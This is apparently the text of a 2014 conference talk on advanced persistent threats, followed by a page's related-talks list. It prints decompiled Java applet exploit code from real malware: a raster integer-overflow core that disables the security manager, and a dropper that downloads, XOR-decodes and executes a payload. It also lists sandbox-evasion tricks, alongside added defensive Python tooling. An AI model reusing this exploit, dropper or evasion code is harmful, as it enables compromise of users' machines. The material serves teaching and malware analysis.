Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
ROME 11-12.04.2014
www.codemotionworld.com
THE MAGIC WORLD OF ADVANCED PERSISTENT THREATS
Andrea Pompili, apompili@hotmail.com
"There are only 10 types of people in the world: those who understand binary, and those who don't"
Attacker Math (Dino Dai Zovi)
http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf
How does an attack develop?
<1996> The Dark Side of the Moon
http://vx.org.ua/29a/main.html
<2000> LoveLetter (the VBScript header of the original sample)
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
Estimated damage: 8.7 billion dollars
<2001> The Nimda Style
Nimda combined several propagation vectors in a single worm:
> Microsoft IIS/PWS Extended Unicode Directory Traversal Vulnerability
> Microsoft IIS/PWS Escaped Characters Decoding Command Execution Vulnerability
> Microsoft IE MIME Header Attachment Execution Vulnerability (the e-mail attachment runs on preview)
> TFTP server on UDP 69 (used to pull the worm body onto freshly compromised IIS hosts)
> RICHED20.DLL: Microsoft Office 2000 DLL Execution Vulnerability (a trojaned DLL dropped next to documents is loaded by Office)
Estimated damage: 635 million dollars
<2003> SQL Slammer
> Target: SQL Server 2000 Desktop Engine
> 75,000 computers infected in just 10 minutes
> Payload of only 376 bytes (memory-resident only, never touches disk)
Estimated damage: 1.2 billion dollars
<2004> MyDoom
Estimated damage: 22.6 billion dollars
> DDoS against www.sco.com
> Backdoor listening on TCP 3127-3198
> Upload & Execute command, triggered by the byte sequence 0x85 0x13 0x3c 0x9e 0xa2
http://echohacker.altervista.org/articoli/mydoom.html
<2010-2012> Government in Action
> Stuxnet (2010)
> Duqu (2011)
> Flame (2012)
> Gauss (2012)
Shopping For Zero-Days
http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits/
The most complex malware in history (Flame)
> 20 MB in size (900 KB main program/dropper + 16 modules identified so far)
> 80 domains used as Command and Control systems
> Spreads via USB stick (Infectmedia)
> Bluetooth device enumeration (Beetlejuice)
> Audio recording (Microbe)
> Windows Update MITM (Munch & Gadget)
MD5 Collision Attack: a chosen-prefix MD5 collision produced a certificate chaining to Microsoft's root, so the Windows Update man-in-the-middle could serve binaries that passed signature checks
<2007> Storm Worm & CyberCrime Market
http://www.pcworld.com/article/138694/article.html
http://www.infosecblog.org/2013/01/you-are-the-target/hackedpc2012/
Advanced Persistent Threats 101
> Trust Exploitation
  Social Engineering
  Spear Phishing
  Botnet
  Drive-to-Click Strategy
> Client Exploitation
  Exploit Pack (e.g. Neutrino)
  0-Day
> Multi-Stage Shellcoding
  Dropper/Downloader
  Modules (e.g. RAT, Infostealer, etc.)
  Good Covert Channel
> Multi-Vector
  Email
  WebSites
  Botnet
  Physical (USB)
> Resiliency
  Camouflaging
  Command & Control
  Good Covert Channel
Make or Buy?
The Botnet Choice
Drive-to-Click <#1> to <#5> (screenshot sequence, no slide text)
Trick#1> Playing with extensions
RLO Unicode control character: U+202E RIGHT-TO-LEFT OVERRIDE makes a bidi-aware UI draw everything after it reversed, so a file whose code points read "invoice[RLO]fdp.exe" is displayed as "invoiceexe.pdf" while the OS still dispatches on the real .exe extension.
Trick#2> Content-Disposition Nightmare
http://www.gnucitizen.org/blog/content-disposition-hacking/
The name a browser proposes for a download comes from the server's response headers (Content-Disposition, RFC 2616), i.e. from the attacker when the server is hostile; browsers have parsed that header inconsistently, so the name in the save dialog need not match the link the user clicked.
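Tricks #1 and #2 reduce to one question: what name does the user see, and what name does the OS act on. The following is an added example, not code from the talk, written from the defender's side in Python: a download-name inspector of my own that parses Content-Disposition (filename* over filename, as RFC 6266 prescribes), then checks the result for the RLO trick and produces a name safe to store. The header strings are constructed; the bidi rendering model is a simplified approximation of UAX #9, enough for the spoofing case.

```python
import re
import unicodedata
from urllib.parse import unquote

# Unicode bidi controls: LRE/RLE/PDF/LRO/RLO, the isolates LRI/RLI/FSI/PDI, and LRM/RLM.
BIDI_CONTROLS = frozenset("\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069\u200e\u200f")
RLO, PDF = "\u202e", "\u202c"

# parameter = token "=" ( quoted-string | token ); '*' admitted so filename* parses.
_PARAM_RE = re.compile(r'([A-Za-z0-9!#$&+.^_`|~*-]+)\s*=\s*(?:"((?:[^"\\]|\\.)*)"|([^;]*))')

def parse_content_disposition(header):
    """Return (disposition-type, {param: value}). Quoted-pairs are unescaped; a
    filename* value (RFC 5987 charset'lang'pct-encoded) is decoded with its charset."""
    disp, _, rest = header.partition(";")
    params = {}
    for m in _PARAM_RE.finditer(rest):
        key = m.group(1).lower()
        if m.group(2) is not None:
            value = re.sub(r"\\(.)", r"\1", m.group(2))
        else:
            value = m.group(3).strip()
        if key.endswith("*"):
            charset, _, tail = value.partition("'")
            _, _, encoded = tail.partition("'")
            value = unquote(encoded, encoding=charset or "utf-8", errors="replace")
        params[key] = value
    return disp.strip().lower(), params

def rendered_name(name):
    """Approximate what a bidi-aware UI draws: from RLO on, text runs right-to-left
    (appears reversed) until PDF or end of string; other bidi controls are invisible."""
    head, found, tail = name.partition(RLO)
    if not found:
        return "".join(c for c in name if c not in BIDI_CONTROLS)
    overridden, _, rest = tail.partition(PDF)
    return head + overridden[::-1] + rest

def real_extension(name):
    """The extension the OS really dispatches on: last dot of the raw code points."""
    base = re.split(r"[\\/]", name)[-1]
    return base.rsplit(".", 1)[1].lower() if "." in base else ""

def inspect_download(header, default="download.bin"):
    """Report displayed vs. real name and a storable name: basename only,
    no control/format characters (category C*), no leading dots."""
    disp, params = parse_content_disposition(header)
    raw = params.get("filename*") or params.get("filename") or default  # RFC 6266: filename* wins
    base = re.split(r"[\\/]", raw)[-1]
    flags = []
    if base != raw:
        flags.append("path_component")
    if any(c in BIDI_CONTROLS for c in raw):
        flags.append("bidi_override")
    rendered = rendered_name(raw)
    real_ext = real_extension(raw)
    if real_ext != real_extension(rendered):
        flags.append("extension_mismatch")
    safe = "".join(c for c in base if not unicodedata.category(c).startswith("C")).lstrip(". ")
    return {"disposition": disp, "raw": raw, "rendered": rendered,
            "real_ext": real_ext, "safe": safe or default, "flags": flags}
```

Feeding it `attachment; filename*=UTF-8''invoice%E2%80%AEfdp.exe` yields rendered `invoiceexe.pdf`, real extension `exe`, and both `bidi_override` and `extension_mismatch` flagged; a gateway that rewrites the name to the `safe` value and blocks on `extension_mismatch` defeats both tricks at once.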
Trick#3> Client Exploiting
<applet codebase="http://blahblah.evilsite.in/hiddenpath/"
        archive="http://blahblah.othersite.in/hiddenpath/c8c34734f41cca863a972129369060d9"
        code="rgmiv">
public class xp extends JApplet {
public void init() {
try {
Object aobj[] = new Object[0];
Object obj = gsdfvg.ccla(tcbteokd.fuss(tcbteokd.p), 1);
String s = "hpjwbludyi";
s = "wgpxrwyvzolbb";
s = "zdfmvftloqmakqysyu";
s = "nrrkqnjfylgtljyyferr";
cr.hzumfnc(obj);
Object aobj1[] = new Object[0];
String s1 = "ofvszonrzgelnko";
s1 = "fefhtspcqhj";
s1 = "evztavmzjarjgwu";
Object obj1 = ygigtele.bjixqh(tcbteokd.fuss(tcbteokd.nq), new Class[] {
Integer.TYPE
}).newInstance(new Object[] {
Integer.valueOf(tcbteokd.mdrikbua(9))
});
int ai[] = new int[8];
Object aobj2[] = new Object[7];
aobj2[2] = cr.hzumfnc(obj);
...
<01> XOR String Encryption
public static String ok = ha.n("1:-:u:,/u26:<>ub:6+7>0264?>7");
...
public static String n(String s) {
String s1 = "";
for (int i = 0; i < s.length(); i++)
s1 += idzfihff(s.charAt(i));
return s1;
}
...
public static char idzfihff(char c) {
return (char)(c ^ 0x5b);
}
https://media.blackhat.com/bh-us-12/Briefings/Oh/BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf
Malware
<02> Java Reflection
public static Class fuss(String s) throws Exception {
return Class.forName(s);
}
...
public static Object dngfuv(Method method, Object obj, Object aobj[]) {
return method.invoke(obj, aobj);
}
public static Constructor bjixqh(Class class1, Class aclass[]) {
return class1.getConstructor(aclass);
}
...
https://media.blackhat.com/bh-us-12/Briefings/Oh/BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf
Malware
<03> ClassLoader Override
class t extends ClassLoader {
public static void ujrzjw(t t1, String s) {
try {
Class class1 = t1.defineClass("qbw",
tcbteokd.xcpoalaefqfvuacylvakyi, 0,
tcbteokd.xcpoalaefqfvuacylvakyi.length);
ygigtele.bjixqh(class1, new Class[] {
tcbteokd.fuss("java.lang.String")
}).newInstance(new Object[] { s });
} catch (Exception ex) {
System.exit(0);
}
}
}
Malware
The Dropper Class
...
private static void lcsqyrgtbct(String s, int i) {
    String s1 = s + Integer.valueOf(i);              // payload URL = base URL + numeric stage id
    ...
    rchannel = Channels.newChannel((new URL(s1)).openStream());
    ...
    File file = File.createTempFile("~tmf", null);   // dropped under the user's temp directory
    FileOutputStream fos = new FileOutputStream(file);
    for (int j = 0; j < abyte0.length; j++)
        abyte0[j] = (byte)(abyte0[j] ^ 0x29);        // single-byte XOR "decryption" of the download
    fos.write(abyte0);
    if (abyte0.length > 1024)                        // crude sanity check: anything shorter is a failed download
        try {
            Runtime.getRuntime().exec(new String[] {
                "cmd.exe", "/C", file.getAbsolutePath()
            });
        } catch (IOException ioe) {
            (new ProcessBuilder(new String[] {      // fallback if cmd.exe cannot be spawned
                file.getAbsolutePath()
            })).start();
        }
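Both the <01> string obfuscation (key 0x5b) and the dropper's payload loop (key 0x29) are the same single-byte XOR, and an analyst undoes them the same way. The following is an added example, not code from the talk or from the applet, in Python rather than Java because it is analyst-side tooling: it mirrors ha.n(), recovers the key of a string by brute force over a plausible-character set, and recovers the payload key by known plaintext from the "MZ" header. The first 15 characters of the literal shown on the slide decode to "java.awt.image." under 0x5b and are used as-is; the PE header fragment is constructed, not a real binary.

```python
import string

def xor_bytes(data, key):
    """Single-byte XOR over bytes; XOR is its own inverse, so this both 'encrypts'
    (as the applet author did) and decrypts."""
    return bytes(b ^ key for b in data)

def xor_str(s, key):
    """Character-wise twin of the applet's ha.n()/idzfihff(): chr(ord(c) ^ key)."""
    return "".join(chr(ord(c) ^ key) for c in s)

# First 15 characters of the literal on the <01> slide; decodes to "java.awt.image."
SLIDE_LITERAL_PREFIX = "1:-:u:,/u26:<>u"

# Characters plausible in a Java class/method name or a URL path (this example's choice).
_PLAUSIBLE = frozenset(string.ascii_letters + string.digits + "._$/:-")

def recover_key_by_charset(blob, allowed=_PLAUSIBLE):
    """Try all 256 keys and keep those whose output is entirely plausible text.
    Returns candidate keys; for short class-name strings the list is usually tiny."""
    return [k for k in range(256)
            if all(chr(b) in allowed for b in xor_bytes(blob, k))]

def recover_key_known_prefix(blob, prefix):
    """Known-plaintext recovery for the dropper stage: a Windows PE starts with b'MZ',
    so each prefix byte yields the key, and the candidates must all agree."""
    keys = {blob[i] ^ prefix[i] for i in range(len(prefix))}
    return keys.pop() if len(keys) == 1 else None

DROPPER_KEY = 0x29  # the constant in the dropper's loop on the slide

def decode_dropper_payload(blob):
    """Mirror of abyte0[j] ^= 0x29, followed by an MZ check this example adds
    (the original only checks that the download exceeds 1024 bytes)."""
    data = xor_bytes(blob, DROPPER_KEY)
    return data if data.startswith(b"MZ") else None

# Constructed stand-in for a downloaded payload: a PE header fragment, not a real binary.
FAKE_PE_HEAD = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
```

On a real sample the XOR'd download is what the network capture contains, so `recover_key_known_prefix(capture, b"MZ")` gives the key without touching the Java at all; the charset brute force is for the strings inside the JAR, where no such anchor exists.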
The Malware Core
Object obj1 = new java.awt.image.DataBufferByte(9);
int[] ai = new int[8];
Object[] oo = new Object[7];
// queued to run once memory is corrupted: System.setSecurityManager(null) drops the applet sandbox
oo[2] = new java.beans.Statement(System.class, "setSecurityManager", new Object[1]);
...
DataBufferByte obj5 = new DataBufferByte(8);
for (int j = 0; j < 8; j++)
    obj5.setElem(j, -1);
MultiPixelPackedSampleModel obj6 =
    new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE, 4, 1, 1, 4, 0);
Raster obj7 = Raster.createWritableRaster(obj6, obj5, null);
// second raster is backed by the 9-byte obj1 but declared with an oversized scanline stride
// and bit offset (the integer overflow described in the write-up linked below)
MultiPixelPackedSampleModel obj8 =
    new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE, 4, 2, 1,
        0x3fffffdd - (tcbteokd.pi ? 16 : 0), 288 + (tcbteokd.pi ? 128 : 0));
Raster obj9 = Raster.createWritableRaster(obj8, obj1, null);
byte[] obj10 = new byte[] {0, -1};
IndexColorModel obj11 = new IndexColorModel(1, 2, obj10, obj10, obj10);
CompositeContext obj12 = AlphaComposite.Src.createContext(obj11, obj11, null);
obj12.compose(obj7, obj9, obj9);   // the composite write lands outside obj1
http://valhalla.allalla.com/2013/08/java-netbeans-applet-integer-overflow-win32-target-added/
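The four slides above (<01> XOR strings, <02> reflection, <03> ClassLoader override, and the setSecurityManager/AWT raster core) are exactly the constructs a triage script can look for in a pile of decompiled applets before anyone reads them by hand. The following is an added example, not from the talk: a regex-based indicator scan over Java source, in Python. The patterns follow the code shown on the slides; the weights, thresholds and the sample applet text are this example's own constructions, not a published rule set.

```python
import re

# (name, regex over decompiled Java source, weight); weights are this example's choice.
INDICATORS = [
    ("reflection_forName",    r"Class\.forName\s*\(",                                        2),
    ("reflection_invoke",     r"\.(?:invoke|getConstructor|getMethod|newInstance)\s*\(",      1),
    ("custom_classloader",    r"\bextends\s+ClassLoader\b",                                 2),
    ("classloader_define",    r"\bdefineClass\s*\(",                                         3),
    ("disable_securitymgr",   r"\bsetSecurityManager\b",                                     4),
    ("xor_decode",            r"\^\s*0x[0-9a-fA-F]{1,2}\b",                                  2),
    ("dead_string_assign",    r'String\s+(\w+)\s*=\s*"[^"]*";\s+\1\s*=\s*"',                1),
    ("drop_and_exec",         r"createTempFile|Runtime\.getRuntime\(\)\.exec|new\s+ProcessBuilder", 3),
    ("awt_raster_primitives", r"MultiPixelPackedSampleModel|DataBufferByte|AlphaComposite\.Src",   2),
]

def scan_java_source(src):
    """Count matches per indicator, sum the weights of those that fired, and map the
    score to a verdict. Counting lets a reviewer see e.g. how many dead-string pairs exist."""
    hits = {}
    for name, pattern, _ in INDICATORS:
        n = len(re.findall(pattern, src))
        if n:
            hits[name] = n
    score = sum(w for name, _, w in INDICATORS if name in hits)
    verdict = "likely-exploit" if score >= 8 else "review" if score >= 4 else "clean"
    return {"hits": hits, "score": score, "verdict": verdict}

# Constructed sample modelled on the decompiled applet from the slides.
SAMPLE_APPLET = r'''
public class xp extends JApplet {
    public void init() throws Exception {
        Class klass = tcbteokd.fuss("java.awt.image.DataBufferByte");
        Object buf = klass.getConstructor(new Class[] { Integer.TYPE }).newInstance(new Object[] { 9 });
        String s = "hpjwbludyi";
        s = "wgpxrwyvzolbb";
        Object[] oo = new Object[7];
        oo[2] = new java.beans.Statement(System.class, "setSecurityManager", new Object[1]);
        File f = File.createTempFile("~tmf", null);
        Runtime.getRuntime().exec(new String[] { "cmd.exe", "/C", f.getAbsolutePath() });
        new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE, 4, 2, 1, 0x3fffffdd, 288);
    }
}
class tcbteokd {
    public static Class fuss(String s) throws Exception { return Class.forName(s); }
    public static char idzfihff(char c) { return (char)(c ^ 0x5b); }
}
class t extends ClassLoader {
    Class load(byte[] b) { return defineClass("qbw", b, 0, b.length); }
}
'''
BENIGN = 'public class Hello { public static void main(String[] a) { System.out.println("hi"); } }'
```

Reflection alone is common in legitimate code, which is why it carries a low weight; it is the combination with defineClass, setSecurityManager and a temp-file exec that pushes a JAR into "likely-exploit". Run the scan over the output of a decompiler (procyon, CFR, JD) across a whole exploit-kit landing page and sort by score.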
The Cheaper Path to Exploiting
Blackhole Exploit Kit
http://en.wikipedia.org/wiki/Blackhole_exploit_kit
Styx Exploit Pack
http://krebsonsecurity.com/2013/07/styx-exploit-pack-domo-arigato-pc-roboto
Neutrino
http://malware.dontneedcoffee.com/2013/03/hello-neutrino-just-one-more-exploit-kit.html
RedKit
http://blog.spiderlabs.com/2012/05/a-wild-exploit-kit-appears.html
The InfoStealer Choice
The RAT Choice
Bitcoin + APT = Ransomware
The Command&Control Choice <#1> to <#4> (screenshot sequence, no slide text)
<2012> The Antivirus Maker Confession
"The truth is, consumer-grade antivirus products can't protect against targeted malware created by well-resourced nation-states with bulging budgets. They can protect you against run-of-the-mill malware: banking trojans, keystroke loggers and e-mail worms. But targeted attacks like these go to great lengths to avoid antivirus products on purpose"
Mikko Hyppönen (F-Secure)
The Way to Sandboxing
<01> USER-MODE AGENT: a software component inside the guest operating system (keylogger-style hooking)
<02> KERNEL-MODE PATCHING: the guest operating system kernel is modified for tracing (rootkit-style hooking)
<03> VIRTUAL MACHINE MONITORING: a customized hypervisor monitors the guest operating system from outside
<04> SYSTEM EMULATION: a hardware emulator hooks the relevant memory, I/O functions, peripherals, etc.
<05> KERNEL EMULATION: a kernel emulator hooks the relevant system calls, etc.
A (very) partial list of the players
> Norman Sandbox (Norway2001)
> FireEye (US2004)
> Damballa (US2006)
> Lastline/Anubis/Wepawet (Austria 2006)
> Sandboxie (2006)
> Cuckoo Sandbox (2010)
> VMRay formerly CWSandbox (Germany 2007)
> Joe Security LLC (Switzerland 2007)
> BitBlaze (2008)
> ThreatExpert (Ireland 2008)
> Ether (US 2009)
A (completely) partial list of the evaders
Evading Sandbox 4 Dummies
> Human Interaction (UpClicker, December 2012)
> MessageBox (something that needs to be clicked)
> Sleep Calls (Trojan Nap, uncovered in February 2013)
> Time Triggers (Hastati, March 2013: a massive, data-destroying attack in South Korea)
> Check Internet Connection
> Check Volume information and Size
> Check self Executable name
> Execution after reboot
> Check System services, files and communication ports
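Every item on that list is cheap for the malware and, read back from the sandbox's own hook log, equally cheap to spot: a sample that probes the volume, the guest drivers and the connectivity, polls the mouse, asks for a ten-minute sleep and exits without ever writing a file or opening a socket is telling you it noticed. The following is an added example, not from the talk: a classifier over a Cuckoo-style API trace, in Python. The API names are real Win32 names; the trace format, the two traces, the thresholds and the verdict labels are this example's assumptions.

```python
from collections import Counter

# Win32 API names as a Cuckoo-style hook log records them; groupings follow the slide.
SLEEP_APIS   = {"Sleep", "SleepEx", "NtDelayExecution"}
POLL_APIS    = {"GetCursorPos", "GetAsyncKeyState", "GetLastInputInfo"}   # waiting for a human
PAYLOAD_APIS = {"WriteFile", "connect", "InternetOpenUrlW", "URLDownloadToFileW",
                "CreateProcessW", "WinExec"}                              # "real" activity
SIMPLE_RULES = {
    "messagebox_gate":    {"MessageBoxA", "MessageBoxW"},
    "time_trigger":       {"GetLocalTime", "GetSystemTime", "NtQuerySystemTime"},
    "connectivity_check": {"InternetCheckConnectionW", "InternetGetConnectedState", "getaddrinfo"},
    "volume_check":       {"GetVolumeInformationW", "GetDiskFreeSpaceExW"},
    "self_name_check":    {"GetModuleFileNameW"},
}

def classify_trace(trace, sleep_budget_ms=60_000, min_polls=20):
    """trace: list of {"t": seconds, "api": name, "args": {...}} in call order.
    Returns the evasion techniques seen and whether any payload-like call occurred."""
    counts = Counter(ev["api"] for ev in trace)
    args = lambda ev: ev.get("args", {})
    findings = {}

    # Stalling: total *requested* sleep, even if the sandbox shortened the real wait.
    requested = sum(args(ev).get("ms", 0) for ev in trace if ev["api"] in SLEEP_APIS)
    if requested > sleep_budget_ms:
        findings["sleep_stalling"] = requested

    # Human-interaction gate: tight polling of mouse/keyboard state.
    polls = sum(counts[a] for a in POLL_APIS)
    if polls >= min_polls:
        findings["human_interaction"] = polls

    for rule, apis in SIMPLE_RULES.items():
        n = sum(counts[a] for a in apis)
        if n:
            findings[rule] = n

    # Environment probes: service enumeration or opening hypervisor guest devices.
    probes = sum(1 for ev in trace
                 if ev["api"] in {"OpenSCManagerW", "EnumServicesStatusExW"}
                 or (ev["api"] == "CreateFileW" and args(ev).get("path", "").startswith("\\\\.\\")))
    if probes:
        findings["environment_probe"] = probes

    # "Run me after reboot": autostart key or service, which a single-run sandbox never sees.
    persist = sum(1 for ev in trace
                  if ev["api"] == "CreateServiceW"
                  or (ev["api"] == "RegSetValueExW"
                      and "CurrentVersion\\Run" in args(ev).get("key", "")))
    if persist:
        findings["reboot_persistence"] = persist

    payload = any(ev["api"] in PAYLOAD_APIS for ev in trace)
    if findings and not payload:
        verdict = "evasive-suspect"        # recon only, then quiet: rerun longer, with fake input
    elif findings:
        verdict = "evasive-but-detonated"
    else:
        verdict = "no-evasion-seen"
    return {"findings": findings, "payload_activity": payload, "verdict": verdict}

# Constructed traces (not captured from a real sample).
EVASIVE_TRACE = [
    {"t": 0.00, "api": "GetModuleFileNameW", "args": {"path": "C:\\analysis\\sample.exe"}},
    {"t": 0.01, "api": "GetVolumeInformationW", "args": {"root": "C:\\"}},
    {"t": 0.02, "api": "GetDiskFreeSpaceExW", "args": {"root": "C:\\", "total_bytes": 21474836480}},
    {"t": 0.03, "api": "CreateFileW", "args": {"path": "\\\\.\\VBoxGuest"}},
    {"t": 0.05, "api": "InternetGetConnectedState", "args": {}},
    {"t": 0.06, "api": "NtDelayExecution", "args": {"ms": 600_000}},   # ten minutes
] + [
    {"t": 0.10 + i * 0.05, "api": "GetCursorPos", "args": {"x": 512, "y": 384}} for i in range(40)
] + [
    {"t": 2.50, "api": "RegSetValueExW",
     "args": {"key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "value": "upd"}},
    {"t": 2.60, "api": "ExitProcess", "args": {"code": 0}},
]
DETONATED_TRACE = [
    {"t": 0.0, "api": "URLDownloadToFileW", "args": {"url": "http://example.invalid/stage2"}},
    {"t": 0.4, "api": "CreateProcessW", "args": {"cmd": "C:\\Users\\u\\AppData\\Local\\Temp\\~tmf.exe"}},
]
```

The useful signal is the verdict, not any single rule: "evasive-suspect" is the case the slide's patient-zero argument is about, a sample that ran clean in the sandbox precisely because it recognised it, and it should be re-run with a longer timeout, synthetic mouse input and a reboot rather than released.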
The limit of sandboxes
Analysis takes minutes, and the first victim is already infected by the time the verdict arrives.
def: Patient Zero is the first patient identified in the population sample of an epidemiological investigation…
Certainly better than trusting the users
Questions? (Domande? in Italian, ¿Preguntas? in Spanish, tupoQghachmey in Klingon, Ερωτήσεις? in Greek, вопросы? in Russian; also shown in Arabic, Sindarin and Japanese)

 
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...Codemotion
 
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...Codemotion
 
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...Codemotion
 
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...Codemotion
 
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019Codemotion
 
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019Codemotion
 
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019Codemotion
 
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...Codemotion
 
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...Codemotion
 
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019Codemotion
 
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019Codemotion
 
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019Codemotion
 
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...Codemotion
 

Más de Codemotion (20)

Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
 
Pastore - Commodore 65 - La storia
Pastore - Commodore 65 - La storiaPastore - Commodore 65 - La storia
Pastore - Commodore 65 - La storia
 
Pennisi - Essere Richard Altwasser
Pennisi - Essere Richard AltwasserPennisi - Essere Richard Altwasser
Pennisi - Essere Richard Altwasser
 
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
 
Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019
Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019
Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019
 
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
 
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 -
Francesco Baldassarri  - Deliver Data at Scale - Codemotion Amsterdam 2019 - Francesco Baldassarri  - Deliver Data at Scale - Codemotion Amsterdam 2019 -
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 -
 
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
 
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
 
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
 
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
 
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
 
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
